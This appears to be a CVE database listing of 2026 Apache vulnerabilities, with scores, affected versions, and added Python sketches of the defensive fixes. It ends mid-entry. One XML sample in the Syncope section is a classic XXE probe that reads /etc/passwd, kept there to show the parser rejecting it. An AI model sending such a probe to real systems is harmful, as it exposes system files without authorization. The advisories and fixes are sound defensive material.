134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-23552

Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy of the Apache Camel Keycloak component. The Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation. This issue affects Apache Camel: from 4.15.0 before 4.18.0. Users are recommended to upgrade to version 4.18.0, which fixes the issue.

Products Affected

Vendor Product Version
apache camel *
CVE-2026-23794

Reflected XSS in Apache Syncope's Enduser Login page. An attacker that tricks a legitimate user into clicking a malicious link and logging in to Syncope Enduser could steal that user's credentials. This issue affects Apache Syncope: from 3.0 through 3.0.15, from 4.0 through 4.0.3. Users are recommended to upgrade to version 3.0.16 / 4.0.4, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 2.3 4.0

Products Affected

Vendor Product Version
apache syncope *
CVE-2026-23795

Improper Restriction of XML External Entity Reference vulnerability in Apache Syncope Console. An administrator with adequate entitlements to create or edit Keymaster parameters via the Console can construct malicious XML text to launch an XXE attack, thereby causing sensitive data leakage. This issue affects Apache Syncope: from 3.0 through 3.0.15, from 4.0 through 4.0.3. Users are recommended to upgrade to version 3.0.16 / 4.0.4, which fix this issue.
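
Both this Syncope issue and the Apache SIS one under CVE-2025-68280 have the same root: an XML parser that honours a DOCTYPE, and with it an external entity pointing at a local file. The Java-side mitigation the SIS advisory gives (javax.xml.accessExternalDTD set to an empty list) closes the external fetch; the stricter and simpler policy, when the format never legitimately carries a DTD, is to refuse any DOCTYPE at all. The Python below is an added illustration of that policy on the standard-library expat parser, not SIS or Syncope code; the two XML samples are constructed.

```python
import xml.parsers.expat


class UnsafeXml(Exception):
    """Raised when a document declares a DTD or an entity."""


def parse_without_dtd(data: bytes) -> str:
    """Parse XML with a parser that aborts at the first DOCTYPE or entity
    declaration, before any entity could be resolved. Returns the
    concatenated character data of the document (enough for the demo)."""
    parser = xml.parsers.expat.ParserCreate()
    texts = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} not allowed (system id {system_id!r})")

    def reject_entity(*_decl):
        raise UnsafeXml("entity declarations not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.CharacterDataHandler = texts.append
    parser.Parse(data, True)      # exceptions raised in handlers propagate here
    return "".join(texts)


def is_rejected(data: bytes) -> bool:
    """True if parse_without_dtd refuses the document as unsafe."""
    try:
        parse_without_dtd(data)
    except UnsafeXml:
        return True
    return False


# Constructed samples: a benign GPX-like fragment and the classic XXE probe.
SAFE_DOC = b'<?xml version="1.0"?><gpx><name>trail</name></gpx>'
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           b'<d>&xxe;</d>')
```

Rejecting the DOCTYPE up front is what libraries such as defusedxml do under the name `forbid_dtd`; it also removes the related billion-laughs expansion vector, which the external-access property alone does not.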

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache syncope *
CVE-2026-23901

Observable Timing Discrepancy vulnerability in Apache Shiro. This issue affects Apache Shiro: 1.* and 2.* before 2.0.7. Users are recommended to upgrade to version 2.0.7 or later, which fixes the issue. Prior to Shiro 2.0.7, the code paths for non-existent and existing users differed enough that a brute-force attacker may be able to determine, from request timing alone, whether a request failed because of a non-existent user or because of a wrong password. The most likely attack vector is a local attack only. The Shiro security model ( https://shiro.apache.org/security-model.html#username_enumeration ) discusses this as well. Typically, brute-force attacks can be mitigated at the infrastructure level.
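
The timing difference comes from the unknown-user path returning before any password hashing is done, while the known-user path pays for a full hash. The usual remedy is to make both paths do the same work: hash against a pre-computed dummy record when the user does not exist and only then reject. The Python below is an added illustration, not Shiro's code; the user store, the PBKDF2 parameters and the dummy record are constructed, and a call counter stands in for a stopwatch so the equal-work property can be checked without measuring time.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000          # constructed; tune upwards in production


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, stored hash).
_SALT = b"constructed-salt"
USERS = {"alice": (_SALT, hash_password("correct horse", _SALT))}

# One dummy record hashed at start-up so an unknown user costs the same as a known one.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = hash_password("dummy", DUMMY_SALT)

HASH_CALLS = {"count": 0}    # instrumentation: how many hashes each login computed


def _counted_hash(password: str, salt: bytes) -> bytes:
    HASH_CALLS["count"] += 1
    return hash_password(password, salt)


def login_leaky(username: str, password: str) -> bool:
    """Pre-fix shape: an unknown user returns immediately, without hashing,
    so the response time reveals whether the username exists."""
    record = USERS.get(username)
    if record is None:
        return False
    salt, expected = record
    return hmac.compare_digest(_counted_hash(password, salt), expected)


def login_constant_work(username: str, password: str) -> bool:
    """Fixed shape: always derive one hash and always run a constant-time
    compare; the verdict for an unknown user is forced to False afterwards."""
    record = USERS.get(username)
    known = record is not None
    salt, expected = record if known else (DUMMY_SALT, DUMMY_HASH)
    match = hmac.compare_digest(_counted_hash(password, salt), expected)
    return match and known


def measured(login, username: str, password: str):
    """Run a login function and return (result, hashes computed during it)."""
    before = HASH_CALLS["count"]
    result = login(username, password)
    return result, HASH_CALLS["count"] - before
```

Equal work removes the gross signal; the remaining micro-differences (one dictionary lookup) are below what a network attacker can resolve, which is why the advisory also points at rate limiting at the infrastructure level as the usual companion control.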

Products Affected

Vendor Product Version
apache shiro *
CVE-2026-23902

Incorrect Authorization vulnerability in Apache DolphinScheduler allows authenticated users with system login permissions to use tenants that are not defined on the platform during workflow execution. This issue affects Apache DolphinScheduler versions prior to 3.4.1.  Users are recommended to upgrade to version 3.4.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2026-23903

Authentication Bypass by Alternate Name vulnerability in Apache Shiro. This issue affects Apache Shiro: before 2.0.7. Users are recommended to upgrade to version 2.0.7, which fixes the issue. The issue only affects static files. If static files are served from a case-insensitive filesystem, such as a default macOS setup, static files may be accessed by varying the case of the filename in the request. If only lower-case (the common default) filters are present in Shiro, they may be bypassed this way. Shiro 2.0.7 and later has new parameters to remediate this issue: in shiro.ini, filterChainResolver.caseInsensitive = true; in application.properties, shiro.caseInsensitive=true. Shiro 3.0.0 and later (upcoming) makes this the default.
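
The bypass is a mismatch between two components' notions of equality: the filter chain compares paths case-sensitively, the filesystem underneath does not, so `/Docs/Internal/x.html` misses the `/docs/internal/**` rule yet opens the same file. The Python below is an added illustration of that interaction, not Shiro code; the Ant-style chain, the "filesystem" and the request paths are constructed, and the flag that mirrors `filterChainResolver.caseInsensitive` is a parameter of the resolver.

```python
import re

# Constructed [urls] section, in shiro.ini order: the first matching pattern wins.
FILTER_CHAIN = [
    ("/admin/**", "authc"),
    ("/docs/internal/**", "authc"),
    ("/**", "anon"),
]

# Constructed static files as stored on disk (their canonical names).
STATIC_FILES = {"/docs/internal/runbook.html", "/admin/index.html", "/index.html"}


def ant_to_regex(pattern: str, case_insensitive: bool) -> "re.Pattern":
    """Translate an Ant-style path pattern: '**' spans directories, '*' and
    '?' stay within one path segment."""
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out, i = out + ".*", i + 2
        elif pattern[i] == "*":
            out, i = out + "[^/]*", i + 1
        elif pattern[i] == "?":
            out, i = out + "[^/]", i + 1
        else:
            out, i = out + re.escape(pattern[i]), i + 1
    return re.compile("^" + out + "$", re.IGNORECASE if case_insensitive else 0)


def resolve_filter(path: str, case_insensitive: bool = False):
    """Name of the filter the chain applies to this request path."""
    for pattern, filt in FILTER_CHAIN:
        if ant_to_regex(pattern, case_insensitive).match(path):
            return filt
    return None


def serve_static(path: str, fs_case_insensitive: bool,
                 resolver_case_insensitive: bool, authenticated: bool) -> int:
    """HTTP status a static request would receive. The filesystem decides
    whether a differently-cased path still finds the file; the resolver
    decides whether the protecting filter still matches it."""
    filt = resolve_filter(path, resolver_case_insensitive)
    if filt == "authc" and not authenticated:
        return 401
    if fs_case_insensitive:
        found = path.lower() in {f.lower() for f in STATIC_FILES}
    else:
        found = path in STATIC_FILES
    return 200 if found else 404
```

Turning on case-insensitive matching in the resolver is the right fix only for static content; for servlet mappings the container's own case-sensitive routing already stops the trick, which is why the advisory limits the impact to static files.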

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache shiro *
CVE-2026-23906

Affected Products and Versions: Apache Druid, versions 0.17.0 through 35.x (all versions prior to 36.0.0). Prerequisites: the druid-basic-security extension is enabled, an LDAP authenticator is configured, and the underlying LDAP server permits anonymous bind.
Vulnerability Description: An authentication bypass vulnerability exists in Apache Druid when using the druid-basic-security extension with LDAP authentication. If the underlying LDAP server is configured to allow anonymous binds, an attacker can bypass authentication by providing an existing username with an empty password. This allows unauthorized access to otherwise restricted Druid resources without valid credentials. The vulnerability stems from improper validation of LDAP authentication responses when anonymous binds are permitted, effectively treating anonymous bind success as valid user authentication.
Impact: A remote, unauthenticated attacker can gain unauthorized access to the Apache Druid cluster, access sensitive data stored in Druid datasources, execute queries and potentially manipulate data, access administrative interfaces if the bypassed account has elevated privileges, and completely compromise the confidentiality, integrity, and availability of the Druid deployment.
Mitigation (immediate, no Druid upgrade required): Disable anonymous bind on your LDAP server. This prevents the vulnerability from being exploitable and is the recommended immediate action.
Resolution: Upgrade Apache Druid to version 36.0.0 or later, which includes fixes to properly reject anonymous LDAP bind attempts.
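
The trap here is an LDAP protocol detail: a simple bind with a non-empty DN and an empty password is an "unauthenticated" bind (RFC 4513, section 5.1.2), which a server allowing anonymous access answers with success. Any client that treats "bind succeeded" as "password verified" is therefore bypassed by an empty password, and the client-side fix is to refuse to bind at all with an empty credential. The Python below is an added illustration, not Druid code; the directory is a constructed stub that behaves like a server with anonymous bind enabled, and the DN template is assumed.

```python
class AnonymousBindLdapStub:
    """Stand-in for a directory with anonymous bind enabled: a bind carrying
    an empty password succeeds whatever DN was supplied (unauthenticated
    bind), a non-empty password is checked against the stored one."""

    def __init__(self, passwords: dict):
        self._passwords = passwords          # dn -> password

    def simple_bind(self, dn: str, password: str) -> bool:
        if password == "":
            return True                      # anonymous / unauthenticated bind
        return self._passwords.get(dn) == password


def user_dn(username: str) -> str:
    """Constructed DN template; a real implementation must escape the
    username per RFC 4514 before splicing it into a DN."""
    return f"uid={username},ou=users,dc=example,dc=org"


def authenticate_vulnerable(server, username: str, password: str) -> bool:
    """Pre-fix shape: the bind result is taken at face value, so an existing
    username plus an empty password 'authenticates'."""
    return server.simple_bind(user_dn(username), password)


def authenticate_fixed(server, username: str, password) -> bool:
    """Fixed shape: an empty or whitespace-only password never reaches the
    directory, so an anonymous bind cannot be mistaken for a user login."""
    if not username or password is None or password.strip() == "":
        return False
    return server.simple_bind(user_dn(username), password)


# Constructed directory with one real account.
DIRECTORY = AnonymousBindLdapStub({"uid=admin,ou=users,dc=example,dc=org": "hunter2"})
```

The server-side mitigation the advisory recommends, disabling anonymous bind, makes the stub's first branch go away; the client-side check is still worth keeping because it does not depend on how every directory the application might be pointed at is configured.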

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache druid *
CVE-2026-23907

This issue affects the ExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.35, from 3.0.0 through 3.0.6. The ExtractEmbeddedFiles example contains a path traversal vulnerability (CWE-22) because the filename obtained from PDComplexFileSpecification.getFilename() is appended to the extraction path. Users who have copied this example into their production code should review it to ensure that the extraction path is acceptable. The example has been changed accordingly: the initial path and the extraction path are now converted into canonical paths and it is verified that the extraction path lies under the initial path. The documentation has also been adjusted.
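
The PDFBox change described above and the Solr allowPaths problem under CVE-2026-22444 both come down to one check: canonicalise the base directory and the attacker-influenced name, then require the result to lie under the base. The Python below is an added illustration of that check, not PDFBox or Solr code; the directory names and file names are constructed and nothing is written to disk. It also refuses UNC-style names outright, since on Windows merely probing `\\host\share` is what leaks the NTLM hash the Solr advisory mentions.

```python
import os


class PathOutsideBase(ValueError):
    """The requested name does not resolve to a location under the base."""


def resolve_inside(base_dir: str, untrusted_name: str, allow_base: bool = False) -> str:
    """Canonical path for untrusted_name under base_dir. Raises if the name
    escapes the base via '..', an absolute path, a symlink or a UNC name."""
    if untrusted_name.startswith(("\\\\", "//")):
        raise PathOutsideBase(f"UNC / network path not allowed: {untrusted_name!r}")
    base = os.path.normcase(os.path.realpath(base_dir))
    # os.path.join discards base when the name is absolute; realpath then
    # resolves '..' and symlinks, so the prefix test below is meaningful.
    candidate = os.path.normcase(os.path.realpath(os.path.join(base, untrusted_name)))
    if candidate == base:
        if allow_base:
            return candidate
        raise PathOutsideBase(f"{untrusted_name!r} names the base directory itself")
    if not candidate.startswith(base + os.sep):
        raise PathOutsideBase(f"{untrusted_name!r} resolves outside {base!r}")
    return candidate


def extraction_target(extract_dir: str, embedded_filename: str) -> str:
    """Where an embedded file with this (PDF-supplied) name may be written."""
    return resolve_inside(extract_dir, embedded_filename)


def configset_dir(allowed_roots, requested_dir: str) -> str:
    """allowPaths-style check: accept requested_dir only if it canonicalises
    under one of the allowed roots."""
    for root in allowed_roots:
        try:
            return resolve_inside(root, requested_dir, allow_base=True)
        except PathOutsideBase:
            continue
    raise PathOutsideBase(f"{requested_dir!r} is not under any allowed path")


def escapes(base_dir: str, name: str) -> bool:
    """True if resolve_inside rejects the name (helper for checks/tests)."""
    try:
        resolve_inside(base_dir, name)
    except PathOutsideBase:
        return True
    return False


def is_allowed_configset(allowed_roots, requested_dir: str) -> bool:
    try:
        configset_dir(allowed_roots, requested_dir)
    except PathOutsideBase:
        return False
    return True
```

Two details matter in practice: both sides must go through `realpath` (comparing a canonical candidate against a raw base fails whenever the base itself sits behind a symlink), and the prefix test must include the separator, otherwise `/srv/out` would accept `/srv/out-other/file`.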

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache pdfbox *
CVE-2026-23969

Apache Superset utilizes a configurable dictionary, DISALLOWED_SQL_FUNCTIONS, to restrict the execution of potentially sensitive SQL functions within SQL Lab and charts. While this feature included restrictions for engines like PostgreSQL, a vulnerability was reported where the default list for the ClickHouse engine was incomplete. This issue affects Apache Superset: before 4.1.2. Users are recommended to upgrade to version 4.1.2, which fixes the issue.

Products Affected

Vendor Product Version
apache superset *
CVE-2026-23984

An Improper Input Validation vulnerability exists in Apache Superset that allows an authenticated user with SQLLab access to bypass the read-only verification check when using a PostgreSQL database connection. While the system effectively blocks standard Data Manipulation Language (DML) statements (e.g., INSERT, UPDATE, DELETE) on read-only connections, it fails to detect them in specially crafted SQL statements. This issue affects Apache Superset: before 6.0.0. Users are recommended to upgrade to version 6.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache superset *
CVE-2026-24015

A vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 1.3.7, from 2.0.0 before 2.0.7. Users are recommended to upgrade to version 1.3.7 or 2.0.7, which fixes the issue.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2026-24098

Apache Airflow versions 3.0.0 through 3.1.7 have a vulnerability that allows authenticated UI users with permission to one or more specific Dags to view import errors generated by other Dags they do not have access to. Users are advised to upgrade to 3.1.7 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-24281

Hostname verification in Apache ZooKeeper ZKTrustManager falls back to reverse DNS (PTR) when IP SAN validation fails, allowing attackers who control or spoof PTR records to impersonate ZooKeeper servers or clients with a valid certificate for the PTR name. It's important to note that attacker must present a certificate which is trusted by ZKTrustManager which makes the attack vector harder to exploit. Users are recommended to upgrade to version 3.8.6 or 3.9.5, which fixes this issue by introducing a new configuration option to disable reverse DNS lookup in client and quorum protocols.
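
The flaw is in which name the verifier is allowed to learn from the network. Matching a DNS SAN against a name the client configured is fine; matching it against the name a PTR record returns hands the choice of name to whoever controls reverse DNS for the peer's address. The Python below is an added illustration of the two verifier shapes, not ZooKeeper's ZKTrustManager; the certificate records are constructed dictionaries standing in for parsed subjectAltName extensions, and the reverse-DNS function is a constructed stub, so no lookup is performed.

```python
import ipaddress

# Constructed subjectAltName contents, as they would look after parsing.
CERT_FOR_SERVER = {"dns": ["zk1.example.org"], "ip": ["10.0.0.11"]}
CERT_ATTACKER = {"dns": ["zk1.example.org"], "ip": []}   # trusted-CA cert for the name only


def fake_reverse_dns(ip: str):
    """Constructed PTR data. An attacker who controls reverse DNS for their
    own address can make it answer with the victim's host name."""
    return {"10.0.0.11": "zk1.example.org", "203.0.113.7": "zk1.example.org"}.get(ip)


def _ip_san_matches(cert: dict, peer_ip: str) -> bool:
    peer = ipaddress.ip_address(peer_ip)
    return any(ipaddress.ip_address(san) == peer for san in cert["ip"])


def _dns_san_matches(cert: dict, name: str) -> bool:
    return name.lower() in (n.lower() for n in cert["dns"])


def verify_peer_vulnerable(cert: dict, peer_ip: str, reverse_dns=fake_reverse_dns) -> bool:
    """Pre-fix shape: try the IP SAN, then trust whatever name the PTR record
    for the peer address supplies."""
    if _ip_san_matches(cert, peer_ip):
        return True
    ptr_name = reverse_dns(peer_ip)
    return ptr_name is not None and _dns_san_matches(cert, ptr_name)


def verify_peer_fixed(cert: dict, peer_ip: str, expected_name=None) -> bool:
    """Fixed shape (reverse lookup disabled): only the IP SAN, or a DNS SAN
    matching a name the client itself was configured with."""
    if _ip_san_matches(cert, peer_ip):
        return True
    return expected_name is not None and _dns_san_matches(cert, expected_name)
```

The advisory's caveat is visible in the constructed data: the attacker still needs `CERT_ATTACKER` to chain to a CA the trust manager accepts. What the PTR fallback removes is the last line of defence when that CA issues a certificate for the name to the wrong party, or when the trust store is broader than it should be.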

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2026-24308

Improper handling of configuration values in ZKConfig in Apache ZooKeeper 3.8.5 and 3.9.4 on all platforms allows an attacker to obtain sensitive information stored in the client configuration from the client's log file. Configuration values are logged at INFO level, so production systems running with default logging are affected. Users are recommended to upgrade to version 3.8.6 or 3.9.5, which fixes this issue.

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2026-24343

Improper Neutralization of Data within XPath Expressions ('XPath Injection') vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: from 1.7.1 before 1.8.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2026-24656

Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The Decanter log socket collector exposes port 4560 without authentication. Even if the collector is configured with an allowed-classes property, that restriction can be bypassed, so the log socket collector is vulnerable to deserialization of untrusted data, potentially causing a DoS. NB: the Decanter log socket collector is not installed by default; users who have not installed it are not impacted by this issue. This issue affects Apache Karaf Decanter before 2.12.0. Users are recommended to upgrade to version 2.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L 2.2 1.4

Products Affected

Vendor Product Version
apache karaf_decanter *
CVE-2026-24713

Improper Input Validation vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 1.3.7, from 2.0.0 before 2.0.7. Users are recommended to upgrade to version 1.3.7 or 2.0.7, which fixes the issue.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2026-24733

Improper Input Validation vulnerability in Apache Tomcat. Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification-invalid) HEAD request using HTTP/0.9. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0-M1 through 9.0.112. Older, EOL versions are also affected. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue.
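
HTTP/0.9 is a request line without a version token and a response that is nothing but the entity body; the only method it defines is GET. A HEAD accepted in that framing passes a constraint that denies GET but allows HEAD, and the 0.9 response format then carries the content anyway. The Python below is an added model of that interaction, not Tomcat code: the request-line parser, the fixed parser that enforces GET-only for 0.9, and the constraint table are constructed, and the response shape for a 0.9 HEAD is an assumption of the model drawn from the advisory's description.

```python
class BadRequest(Exception):
    """Malformed or disallowed request line."""


def parse_request_line(line: str):
    """Return (method, target, version). A two-token line is HTTP/0.9."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) == 2:
        return parts[0], parts[1], "HTTP/0.9"
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        return parts[0], parts[1], parts[2]
    raise BadRequest(f"malformed request line: {line!r}")


def parse_request_line_fixed(line: str):
    """Same parser, plus the rule the fix adds: HTTP/0.9 admits only GET."""
    method, target, version = parse_request_line(line)
    if version == "HTTP/0.9" and method != "GET":
        raise BadRequest("HTTP/0.9 only defines GET")
    return method, target, version


# Constructed security constraint: GET on /reports/* is denied, HEAD is not.
CONSTRAINTS = [{"prefix": "/reports/", "denied_methods": {"GET"}}]


def constraint_allows(method: str, target: str) -> bool:
    for c in CONSTRAINTS:
        if target.startswith(c["prefix"]) and method in c["denied_methods"]:
            return False
    return True


def handle(line: str, parser=parse_request_line):
    """Return (status, body_sent) for a request line under the given parser."""
    try:
        method, target, version = parser(line)
    except BadRequest:
        return 400, False
    if not constraint_allows(method, target):
        return 403, False
    if version == "HTTP/0.9":
        # Assumed model: a 0.9 response is only the body, so a HEAD that was
        # let through is answered with the content GET was denied.
        return 200, True
    return 200, method != "HEAD"   # HTTP/1.x HEAD: headers only
```

The general lesson is independent of Tomcat: any method-based authorization rule has to be evaluated on what the server will actually do with the request, and exotic framings (here a 0.9 request line) must be normalised to the methods the rule language understands before the rule runs.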

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
apache tomcat 9.0.0
apache tomcat 10.0.0
CVE-2026-24734

Improper Input Validation vulnerability in Apache Tomcat Native, Apache Tomcat. When using an OCSP responder, Tomcat Native (and Tomcat's FFM port of the Tomcat Native code) did not complete verification or freshness checks on the OCSP response which could allow certificate revocation to be bypassed. This issue affects Apache Tomcat Native:  from 1.3.0 through 1.3.4, from 2.0.0 through 2.0.11; Apache Tomcat: from 11.0.0-M1 through 11.0.17, from 10.1.0-M7 through 10.1.51, from 9.0.83 through 9.0.114. The following versions were EOL at the time the CVE was created but are known to be affected: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39. Older EOL versions are not affected. Apache Tomcat Native users are recommended to upgrade to versions 1.3.5 or later or 2.0.12 or later, which fix the issue. Apache Tomcat users are recommended to upgrade to versions 11.0.18 or later, 10.1.52 or later or 9.0.115 or later which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat_native *
CVE-2026-24735

Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 1.7.1. An unauthenticated API endpoint incorrectly exposes the full revision history for deleted content. This allows an unauthorized user to retrieve restricted or sensitive information. Users are recommended to upgrade to version 2.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache answer *
CVE-2026-25604

In the AWS Auth Manager (Apache Airflow Amazon provider), the origin of the SAML authentication was used as provided by the client and not verified against the actual instance URL. This allowed an attacker to gain access to different instances, with potentially different access controls, by reusing a SAML response from another instance. You should upgrade to version 9.22.0 of the provider if you use the AWS Auth Manager.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache airflow_providers_amazon *
CVE-2026-25747

Deserialization of Untrusted Data vulnerability in Apache Camel LevelDB component. The Camel-LevelDB DefaultLevelDBSerializer class deserializes data read from the LevelDB aggregation repository using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. An attacker who can write to the LevelDB database files used by a Camel application can inject a crafted serialized Java object that, when deserialized during normal aggregation repository operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.5, from 4.15.0 before 4.18.0. Users are recommended to upgrade to version 4.18.0, which fixes the issue. For the 4.10.x LTS releases, users are recommended to upgrade to 4.10.9, while for 4.14.x LTS releases, users are recommended to upgrade to 4.14.5.

Products Affected

Vendor Product Version
apache camel *
CVE-2026-25903

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a component previously added. The missing authorization requires a more privileged user to add a restricted component to the flow configuration, but permits a less privileged user to make property configuration changes. Apache NiFi installations that do not implement different levels of authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.8.0 is the recommended mitigation.

Products Affected

Vendor Product Version
apache nifi *
CVE-2026-26929

Apache Airflow versions 3.0.0 through 3.1.7 FastAPI DagVersion listing API does not apply per-DAG authorization filtering when the request is made with dag_id set to "~" (wildcard for all DAGs). As a result, version metadata of DAGs that the requester is not authorized to access is returned. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-27172

The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel *
CVE-2026-27446

Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both: - incoming Core protocol connections from untrusted sources to the broker - outgoing Core protocol connections from the broker to untrusted targets This issue affects: - Apache Artemis from 2.50.0 through 2.51.0 - Apache ActiveMQ Artemis from 2.11.0 through 2.44.0. Users are recommended to upgrade to Apache Artemis version 2.52.0, which fixes the issue. The issue can be mitigated by one of the following: - Remove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core. - Use two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this 